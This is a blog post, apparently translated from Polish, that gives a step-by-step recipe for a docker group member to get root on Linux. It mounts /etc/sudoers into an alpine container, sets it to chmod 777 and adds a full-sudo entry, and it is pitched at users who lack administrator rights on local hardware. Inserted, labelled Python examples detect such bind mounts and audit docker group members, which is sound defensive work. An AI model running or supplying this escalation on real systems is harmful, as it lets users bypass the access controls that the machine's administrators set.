How to get access to the admin on Linux using Docker?

budzynskimaciej

Maciej Budzyński

Posted on June 13, 2022

You don't have administrator rights on local hardware? Do you have Linux and Docker? If the answer to the above questions is yes, in this article I will show you how to use Docker to modify the sudoers file, thanks to which you will get administrator privileges.

This article was translated from Polish using Google Translate. The original post can be found on my blog at https://blog.budzynskimaciej.pl.

Prerequisites

The method presented here requires that the restricted user has access to docker commands, i.e. the user belongs to the docker group. Docker configuration requires that the user belongs to this group. This method only works on Linux (tested on Ubuntu).

TLDR

  • Run alpine linux with the file /etc/sudoers mounted as sudoers in the container:
docker run -it -v /etc/sudoers:/sudoers --rm alpine /bin/sh
  • Change the permissions so that sudoers can be edited with vi:
chmod 777 sudoers
vi sudoers
  • Add the required permissions for the user to the sudoers file (press the i key to add an entry):
# A tab is required between user and ALL (TAB once, not 4 spaces)
user    ALL=(ALL:ALL) ALL
  • Save and exit vi:
:wq
  • Change the permissions of the sudoers file back to the default values and exit the container console:
chmod 755 sudoers
exit
  • Verify the changes to sudoers:
cat /etc/sudoers
sudo su

Description of individual commands

docker run -it -v /etc/sudoers:/sudoers --rm alpine /bin/sh

This command pulls the alpine linux image and then starts a container from that image. The -it parameter launches interactive mode (keeps STDIN open, even if it's not connected) and allocates a pseudo-TTY. The -v parameter bind-mounts a host directory or file into the container as a volume. In this case, we bind the host file /etc/sudoers to the sudoers file in the root of our container. The --rm parameter causes the created container to be deleted when we exit the shell. The alpine /bin/sh fragment selects the image from which the container will be created (in this case, alpine linux) and the command (program) to launch, /bin/sh, i.e. the system shell.
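From the defender's side, the bind mount in this command is the part to look for. The following is an added example, not code from the original post: a Python check that scans docker run command lines (for instance from process-execution logs) for bind mounts that expose privilege-controlling host files. The TARGETS list, the function names and the sample command lines are assumptions constructed for illustration.

```python
import posixpath
import shlex

# Host files that decide who is root; this list is an assumption of the example.
TARGETS = ("/etc/sudoers", "/etc/sudoers.d", "/etc/shadow", "/etc/passwd")
# Constructed sample command lines, e.g. as taken from process-execution logs.
SAMPLES = [
    "docker run -it -v /etc/sudoers:/sudoers --rm alpine /bin/sh",
    "docker run --mount type=bind,source=/etc,target=/host-etc,readonly alpine ls",
    "docker run --rm -v /home/dev/app:/app:ro -v pgdata:/data alpine true",
]

def exposed_target(source):
    """Return the protected path a bind-mount source exposes (None if none)."""
    src = posixpath.normpath(source)
    parent = src.rstrip("/") + "/"      # "/" stays "/", "/etc" becomes "/etc/"
    for target in TARGETS:
        if src == target or target.startswith(parent) or src.startswith(target + "/"):
            return target

def parse_bind(flag, spec):
    """Return (host_source, read_only) for a bind mount, None for anything else."""
    if flag == "--mount":               # type=bind,source=...,target=...[,readonly]
        f = dict(item.partition("=")[::2] for item in spec.split(","))
        src, ro = f.get("source") or f.get("src"), f.get("readonly", f.get("ro"))
        if f.get("type") != "bind" or not src:
            return None
        return src, ro is not None and ro.lower() not in ("false", "0")
    parts = spec.split(":")             # -v SRC:DST[:OPTS]; named volumes lack "/"
    if len(parts) < 2 or not parts[0].startswith("/"):
        return None
    return parts[0], "ro" in (parts[2].split(",") if len(parts) > 2 else [])

def risky_binds(cmdline):
    """List (source, exposed_target, writable) for each sensitive bind mount."""
    # Scans the whole argv, so the container's own arguments are examined too.
    argv, hits = shlex.split(cmdline), []
    for i, arg in enumerate(argv):
        flag, _, spec = arg.partition("=")
        if flag in ("-v", "--volume", "--mount"):
            spec = spec or (argv[i + 1] if i + 1 < len(argv) else "")
            bind = parse_bind(flag, spec)
            target = exposed_target(bind[0]) if bind else None
            if target:
                hits.append((bind[0], target, not bind[1]))
    return hits

if __name__ == "__main__":
    print([risky_binds(s) for s in SAMPLES])
```

A mount of a parent directory such as /etc or / is reported as well, because it exposes the same files as mounting /etc/sudoers directly.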

chmod 777 sudoers and vi sudoers

The /etc/sudoers file is protected against editing by default. Because alpine is a minimalistic linux distro, it comes with the vi file editor by default. The sudoers file should be edited with visudo, but alpine does not have it installed by default. To edit the file, give the current user full permissions on it with the chmod 777 sudoers command, run inside the alpine container. Then you can open the sudoers file in the vi editor with the command vi sudoers. To enter text in the vi editor, press the i key on the keyboard.

user ALL=(ALL:ALL) ALL

The above entry gives the user permission to execute all commands. The first field is the name of the user the rule applies to (user). The first ALL means that this rule applies to all hosts. The second ALL means that user can run commands as all users. The third ALL means that user can run commands as all groups. The fourth ALL means that the rule applies to all commands. Remember to keep the appropriate formatting in the file. In Ubuntu, there was a single tab between user and ALL (not four spaces). Personally, I'm not sure if using a single space or 4 spaces won't break anything, so I kept that formatting to be sure.

Exiting vi

To exit the vi editor and save changes, press the esc key on the keyboard, and then type :wq. The commands after the colon are commands for vi. w means that we want to save the changes made to the file and q means close the file.

chmod 755 sudoers and exit

We change the permissions on the sudoers file back to the default values from before editing, and then leave the container shell with the exit command. On exit, the alpine container is removed. Only the downloaded image remains on the disk.

cat /etc/sudoers and sudo su

To verify the access, we can use the command cat /etc/sudoers to check whether the entries were added correctly. We can also use the sudo su command to check whether we can execute commands with sudo.

Conclusion

As you can see, docker allows you to change user permissions and modify files that we do not have access to by default. The docker group is in effect one of the administrative groups: a user in this group who can execute docker commands can modify any file without needing administrator rights.
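The conclusion above, turned into a review check (an added example, not code from the original post): given the contents of /etc/group and /etc/sudoers, it lists every docker group member together with the sudoers entries that grant that user full sudo, using the entry format described earlier. The sample data, the function names and the simplified parsing (no aliases, no included files) are assumptions of this example.

```python
import re

# who  host = (runas_user:runas_group) commands, the entry format the article describes
SPEC = re.compile(r"^(?P<who>\S+)\s+(?P<host>[^\s=]+)\s*=\s*"
                  r"(?:\((?P<as_user>[^:)]*)(?::(?P<as_group>[^)]*))?\)\s*)?(?P<cmds>.+)$")

# Constructed sample data in /etc/group and /etc/sudoers format.
GROUP = "root:x:0:\nsudo:x:27:alice\ndocker:x:998:alice,user,ci\n"
SUDOERS = ("# constructed sample\nDefaults\tenv_reset\nroot\tALL=(ALL:ALL) ALL\n"
           "%sudo\tALL=(ALL:ALL) ALL\nuser\tALL=(ALL:ALL) ALL\n")

def parse_groups(group_text):
    """Map group name -> set of supplementary members (primary GIDs not resolved)."""
    groups = {}
    for line in group_text.splitlines():
        fields = line.split(":")
        if len(fields) == 4:
            groups[fields[0]] = {m for m in fields[3].split(",") if m}
    return groups

def full_grants(sudoers_text):
    """Principals (user or %group) allowed to run every command as root."""
    principals = set()
    for line in sudoers_text.splitlines():
        line = line.strip()
        # Skip comments, include directives (not followed here), Defaults, aliases.
        if not line or line.startswith(("#", "@", "Defaults")) or "_Alias" in line.split()[0]:
            continue
        m = SPEC.match(line)
        # Drop tags such as NOPASSWD: before comparing the command list.
        cmds = re.sub(r"^(?:[A-Z_]+:\s*)+", "", m["cmds"]).strip() if m else ""
        if cmds == "ALL" and m["host"] == "ALL" and m["as_user"] in (None, "ALL", "root"):
            principals.add(m["who"])
    return principals

def audit(group_text, sudoers_text):
    """For each docker group member, list the sudoers principals granting full sudo.

    An empty list marks root-equivalent access that a sudoers review alone misses.
    """
    groups, grants = parse_groups(group_text), full_grants(sudoers_text)
    report = {}
    for user in sorted(groups.get("docker", ())):
        report[user] = sorted(g for g in grants if g == user
                              or (g[0] == "%" and user in groups.get(g[1:], ())))
    return report

if __name__ == "__main__":
    print(audit(GROUP, SUDOERS))
```

In the constructed data, ci has no sudoers entry at all, yet membership in the docker group gives that account the same reach as the other two.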
